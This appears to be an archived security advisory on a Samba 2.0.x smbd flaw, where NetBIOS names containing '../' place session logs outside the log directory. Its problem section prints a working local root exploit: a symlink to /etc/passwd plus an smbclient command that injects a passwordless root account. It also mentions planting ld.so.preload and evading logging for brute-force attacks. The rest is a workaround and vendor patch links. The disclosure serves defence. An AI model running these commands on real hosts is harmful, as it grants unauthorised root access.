COMMAND

    smbd

SYSTEMS AFFECTED

    Samba 2.0.7, 2.0.8

PROBLEM

    Michal   Zalewski   found   following.    Insufficient   parameter
    validation and unsafe default configuration make numerous  systems
    running  samba  SMB  file  sharing  daemon  vulnerable  to  remote
    attacks.

    Due to insufficient NetBIOS  computer name validation in  incoming
    SMB requests, in conjunction with default configuration found  for
    example in RedHat Linux and derivates, samba daemon allows  remote
    attackers  to  create  SMB  session  log files (*.log) with highly
    attacker-dependent contents outside outside logs directory.   This
    vulnerability itself can  be used to  perform DoS attacks,  or, if
    combined  with  unprivileged  local  access,  can  be used to gain
    superuser privileges.

    On vulnerable platforms,  by default, each  SMB session is  logged
    to the file /var/log/samba/<netbios-name>.log.  If the attacker is
    connecting    from    'FOOBAR',    logs    would    be    put   in
    /var/log/foobar.log.  Unfortunately, NetBIOS name  '../../../evil'
    would be accepted, as well, creating /evil.log file.

    This  vulnerability  is  exploitable  if  the following setting is
    present in smb.conf file:

        log file = /var/log/samba/%m.log

    ...which is default on major Linux distributions, and probably few
    other platforms, as well.  On some systems, configuration might be
    different:

        log file = /usr/local/samba/var/log.%m

    In the  second case  (e.g. FreeBSD),  there is  usually no  way to
    exploit this vulnerability.

    Additionally, as noticed by Mark Loveless, using specific  NetBIOS
    names, like  'non/existing/dir', it  is possible  to avoid logging
    of error  messages (e.g.  authentication failures)  at all,  which
    might be very useful for performing brute-force attacks.

    Note that any  non-default configuration not  using any prefix  or
    suffix  (log-  or  .log)  in  log  filename would be vulnerable to
    instant remote compromise.

    This is the scenario of local privilege escalation attack  against
    RedHat 7.x installation:

        $ ln -s /etc/passwd /tmp/x.log

        $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`"  -n ../../../tmp/x -N

    ...where 'NIMUE' stands  for local host  name (few error  messages
    should be returned).

        $ su toor
        #

    Explaination of this attack is pretty trivial.  Samba daemon tries
    to access logfile for host introducing itself as '../../../tmp/x'.
    This  translates  to  open() on /var/log/samba/../../../tmp/x.log.
    Thus, /tmp/x.log is opened in O_APPEND mode, following  previously
    created symlink to /etc/passwd.

    Then,  anonymous  attempt  to   mount  non-existing  share   named
    "\ntoor::0:0::/:/bin/sh\n"  is  logged  in  /tmp/x.log, or, if you
    prefer, in /etc/passwd.  Error message looks this way:

        [2001/06/22 14:53:03, 1] smbd/reply.c:reply_sesssetup_and_X(925) Rejecting user 'lcamtuf': authentication failed
        [2001/06/22 14:53:03, 0] smbd/service.c:make_connection(214) ../../../tmp/x (192.233.133.108) couldn't find service toor::0:0::/:/bin/sh

    The last line is, obviously, accepted by /bin/su or /bin/login.

    Linux kernels with openwall patch (with restricted links in  /tmp)
    are imunne  to this  type of  attack (following  symlinks does not
    work, link owner does not  match with file's owner).   The symlink
    restrictions work only in /tmp (mode 1777) directories, so  making
    the symlink in your own homedir still works (should work).

    Another  thing  you  can  do  is  creating  a  symlink pointing to
    non-existing file.  You can create new boot script,  configuration
    files like ld.so.preload or whatever you want.

    If symlink don't  work you can  still use a  hardlink though which
    is yet another reason for making /tmp a separate filesystem.

SOLUTION

    As a temporary workaround, we suggest changing 'log file' setting,
    as described above.  This vulnerability has been confirmed by  the
    vendor, and is addressed there:

        http://us1.samba.org/samba/whatsnew/macroexploit.html

    Removing '%m'  at all  would protect  against attackers  trying to
    avoid logging at all.   Vendor was informed, fix will  be publicly
    available soon.

    For Trustix Linux:

        http://www.trustix.net/pub/Trustix/updates/
        ftp://ftp.trustix.net/pub/Trustix/updates/
           ./1.2/SRPMS/samba-2.0.10-1tr.src.rpm
           ./1.2/RPMS/samba-common-2.0.10-1tr.i586.rpm
           ./1.2/RPMS/samba-client-2.0.10-1tr.i586.rpm
           ./1.2/RPMS/samba-2.0.10-1tr.i586.rpm
           ./1.1/SRPMS/samba-2.0.10-1tr.src.rpm
           ./1.1/RPMS/samba-common-2.0.10-1tr.i586.rpm
           ./1.1/RPMS/samba-client-2.0.10-1tr.i586.rpm
           ./1.1/RPMS/samba-2.0.10-1tr.i586.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/samba-2.0.9-2U40_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/samba-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/samba-clients-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/samba-doc-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/samba-swat-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/samba-2.0.9-2U40_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/samba-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/samba-clients-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/samba-doc-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/samba-swat-2.0.9-2U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/samba-2.0.9-2U41_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/samba-2.0.9-2U41_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/samba-clients-2.0.9-2U41_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/samba-doc-2.0.9-2U41_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/samba-swat-2.0.9-2U41_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/samba-2.0.9-2U42_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/samba-2.0.9-2U42_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/samba-clients-2.0.9-2U42_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/samba-doc-2.0.9-2U42_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/samba-swat-2.0.9-2U42_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/samba-2.0.9-2U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/samba-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/samba-clients-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/samba-doc-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/samba-swat-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/samba-2.0.9-2U51_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/samba-2.0.9-2U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/samba-clients-2.0.9-2U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/samba-doc-2.0.9-2U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/samba-swat-2.0.9-2U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/samba-2.0.9-2U60_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-2.0.9-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-clients-2.0.9-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-doc-2.0.9-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-swat-2.0.9-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/samba-2.0.9-2U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/samba-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/samba-clients-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/samba-doc-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/samba-swat-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/samba-2.0.9-2U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/samba-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/samba-clients-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/samba-doc-2.0.9-2U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/samba-swat-2.0.9-2U50_1cl.i386.rpm

    For Red Hat:

        ftp://updates.redhat.com/5.2/en/os/SRPMS/samba-2.0.10-0.52.src.rpm
        ftp://updates.redhat.com/5.2/en/os/alpha/samba-2.0.10-0.52.alpha.rpm
        ftp://updates.redhat.com/5.2/en/os/alpha/samba-client-2.0.10-0.52.alpha.rpm
        ftp://updates.redhat.com/5.2/en/os/i386/samba-2.0.10-0.52.i386.rpm
        ftp://updates.redhat.com/5.2/en/os/i386/samba-client-2.0.10-0.52.i386.rpm
        ftp://updates.redhat.com/5.2/en/os/sparc/samba-2.0.10-0.52.sparc.rpm
        ftp://updates.redhat.com/5.2/en/os/sparc/samba-client-2.0.10-0.52.sparc.rpm
        ftp://updates.redhat.com/6.2/en/os/SRPMS/samba-2.0.10-0.62.src.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/samba-2.0.10-0.62.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/samba-common-2.0.10-0.62.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/samba-client-2.0.10-0.62.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/samba-2.0.10-0.62.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/samba-common-2.0.10-0.62.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/samba-client-2.0.10-0.62.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/sparc/samba-2.0.10-0.62.sparc.rpm
        ftp://updates.redhat.com/6.2/en/os/sparc/samba-common-2.0.10-0.62.sparc.rpm
        ftp://updates.redhat.com/6.2/en/os/sparc/samba-client-2.0.10-0.62.sparc.rpm
        ftp://updates.redhat.com/7.0/en/os/SRPMS/samba-2.0.10-0.7.src.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/samba-2.0.10-0.7.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/samba-common-2.0.10-0.7.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/samba-client-2.0.10-0.7.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/samba-2.0.10-0.7.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/samba-common-2.0.10-0.7.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/samba-client-2.0.10-0.7.i386.rpm
        ftp://updates.redhat.com/7.1/en/os/SRPMS/samba-2.0.10-2.src.rpm
        ftp://updates.redhat.com/7.1/en/os/alpha/samba-2.0.10-2.alpha.rpm
        ftp://updates.redhat.com/7.1/en/os/alpha/samba-common-2.0.10-2.alpha.rpm
        ftp://updates.redhat.com/7.1/en/os/alpha/samba-client-2.0.10-2.alpha.rpm
        ftp://updates.redhat.com/7.1/en/os/alpha/samba-swat-2.0.10-2.alpha.rpm
        ftp://updates.redhat.com/7.1/en/os/i386/samba-2.0.10-2.i386.rpm
        ftp://updates.redhat.com/7.1/en/os/i386/samba-common-2.0.10-2.i386.rpm
        ftp://updates.redhat.com/7.1/en/os/i386/samba-client-2.0.10-2.i386.rpm
        ftp://updates.redhat.com/7.1/en/os/i386/samba-swat-2.0.10-2.i386.rpm

    For Debian:

        http://security.debian.org/dists/stable/updates/main/source/samba_2.0.7-3.4.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/samba_2.0.7-3.4.dsc
        http://security.debian.org/dists/stable/updates/main/source/samba_2.0.7.orig.tar.gz
        http://security.debian.org/dists/stable/updates/main/binary-all/samba-doc_2.0.7-3.4_all.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/samba-common_2.0.7-3.4_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/samba_2.0.7-3.4_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/smbclient_2.0.7-3.4_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/smbfs_2.0.7-3.4_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/swat_2.0.7-3.4_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/samba-common_2.0.7-3.4_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/samba_2.0.7-3.4_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/smbclient_2.0.7-3.4_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/smbfs_2.0.7-3.4_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/swat_2.0.7-3.4_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/samba-common_2.0.7-3.4_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/samba_2.0.7-3.4_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/smbclient_2.0.7-3.4_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/smbfs_2.0.7-3.4_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/swat_2.0.7-3.4_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/samba-common_2.0.7-3.4_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/samba_2.0.7-3.4_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/smbclient_2.0.7-3.4_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/smbfs_2.0.7-3.4_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/swat_2.0.7-3.4_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/samba-common_2.0.7-3.4_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/samba_2.0.7-3.4_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/smbclient_2.0.7-3.4_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/smbfs_2.0.7-3.4_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/swat_2.0.7-3.4_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/samba-common_2.0.7-3.4_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/samba_2.0.7-3.4_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/smbclient_2.0.7-3.4_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/smbfs_2.0.7-3.4_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/swat_2.0.7-3.4_sparc.deb

    For Immunix OS:

        http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/samba-2.0.10-1_StackGuard_1.i386.rpm
        http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/samba-client-2.0.10-1_StackGuard_1.i386.rpm
        http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/samba-common-2.0.10-1_StackGuard_1.i386.rpm
        http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/samba-2.0.10-1_StackGuard_1.src.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/samba-2.0.10-1_imnx_1.i386.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/samba-client-2.0.10-1_imnx_1.i386.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/samba-common-2.0.10-1_imnx_1.i386.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/samba-2.0.10-1_imnx_1.src.rpm

    For Caldera:

        ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
        ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS
           RPMS/samba-2.0.5-3.i386.rpm
           RPMS/samba-doc-2.0.5-3.i386.rpm
           RPMS/smbfs-2.0.5-3.i386.rpm
           RPMS/swat-2.0.5-3.i386.rpm
           SRPMS/samba-2.0.5-3.src.rpm
        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
           RPMS/samba-2.0.5-3S.i386.rpm
           RPMS/samba-doc-2.0.5-3S.i386.rpm
           RPMS/smbfs-2.0.5-3S.i386.rpm
           RPMS/swat-2.0.5-3S.i386.rpm
           SRPMS/samba-2.0.5-3S.src.rpm
        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
           RPMS/samba-2.0.6-4.i386.rpm
           RPMS/samba-doc-2.0.6-4.i386.rpm
           RPMS/smbfs-2.0.6-4.i386.rpm
           RPMS/swat-2.0.6-4.i386.rpm
           SRPMS/samba-2.0.6-4.src.rpm
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS/
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS
           RPMS/samba-2.0.9-1.i386.rpm
           RPMS/samba-doc-2.0.9-1.i386.rpm
           RPMS/smbfs-2.0.9-1.i386.rpm
           RPMS/swat-2.0.9-1.i386.rpm
           SRPMS/samba-2.0.9-1.src.rpm
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS/
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS
           RPMS/samba-2.0.9-1.i386.rpm
           RPMS/samba-doc-2.0.9-1.i386.rpm
           RPMS/smbfs-2.0.9-1.i386.rpm
           RPMS/swat-2.0.9-1.i386.rpm
           SRPMS/samba-2.0.9-1.src.rpm

    For SuSE:

        ftp://ftp.suse.com/pub/suse/i386/update/7.2/n2/samba-2.2.0a-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/smbclnt-2.2.0a-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/samba-2.2.0a-0.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/samba-2.0.10-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/smbclnt-2.0.10-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/samba-2.0.10-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/smbclnt-2.0.10-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.4/n1/samba-2.0.10-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/n1/samba-2.0.10-0.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.1/n2/samba-2.0.10-0.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.1/n1/smbclnt-2.0.10-0.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.0/n1/samba-2.0.10-0.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.0/n1/smbclnt-2.0.10-0.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.1/n2/samba-2.0.10-0.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/smbclnt-2.0.10-0.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/samba-2.0.10-0.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/smbclnt-2.0.10-0.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.4/n1/samba-2.0.10-0.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.3/n1/samba-2.0.10-0.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n2/samba-2.0.10-0.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/smbclnt-2.0.10-0.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/samba-2.0.10-0.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/smbclnt-2.0.10-0.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/samba-2.0.10-0.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/6.4/n1/samba-2.0.10-0.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/samba-2.0.10-0.src.rpm

    For Mandrake Linux:

        Linux-Mandrake 7.1: 7.1/RPMS/samba-2.0.10-1.3mdk.i586.rpm
                            7.1/RPMS/samba-client-2.0.10-1.3mdk.i586.rpm
                            7.1/RPMS/samba-common-2.0.10-1.3mdk.i586.rpm
                            7.1/SRPMS/samba-2.0.10-1.3mdk.src.rpm
        Linux-Mandrake 7.2: 7.2/RPMS/samba-2.0.10-1.2mdk.i586.rpm
                            7.2/RPMS/samba-client-2.0.10-1.2mdk.i586.rpm
                            7.2/RPMS/samba-common-2.0.10-1.2mdk.i586.rpm
                            7.2/SRPMS/samba-2.0.10-1.2mdk.src.rpm
        Mandrake Linux 8.0: 8.0/RPMS/samba-2.0.10-1.1mdk.i586.rpm
                            8.0/RPMS/samba-client-2.0.10-1.1mdk.i586.rpm
                            8.0/RPMS/samba-common-2.0.10-1.1mdk.i586.rpm
                            8.0/SRPMS/samba-2.0.10-1.1mdk.src.rpm
    Corporate Server 1.0.1: 1.0.1/RPMS/samba-2.0.10-1.3mdk.i586.rpm
                            1.0.1/RPMS/samba-client-2.0.10-1.3mdk.i586.rpm
                            1.0.1/RPMS/samba-common-2.0.10-1.3mdk.i586.rpm
                            1.0.1/SRPMS/samba-2.0.10-1.3mdk.src.rpm